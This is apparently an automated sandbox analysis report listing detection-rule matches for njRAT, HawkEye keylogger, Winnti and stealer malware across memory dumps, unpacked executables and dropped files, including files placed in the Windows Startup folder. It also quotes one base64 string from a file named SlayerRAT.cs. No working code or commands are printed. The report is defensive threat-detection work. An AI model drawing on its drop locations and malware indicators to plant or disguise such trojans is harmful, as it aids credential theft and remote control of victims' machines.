Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.341582297.000001B865D3F000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.616200946.0000000008100000.00000004.00000001.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.616252308.0000000008150000.00000004.00000001.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 13.2.tmpFB21.tmp.exe.8150000.11.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.8100000.10.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.3068cf8.5.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: Tmp.exe.0.dr, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
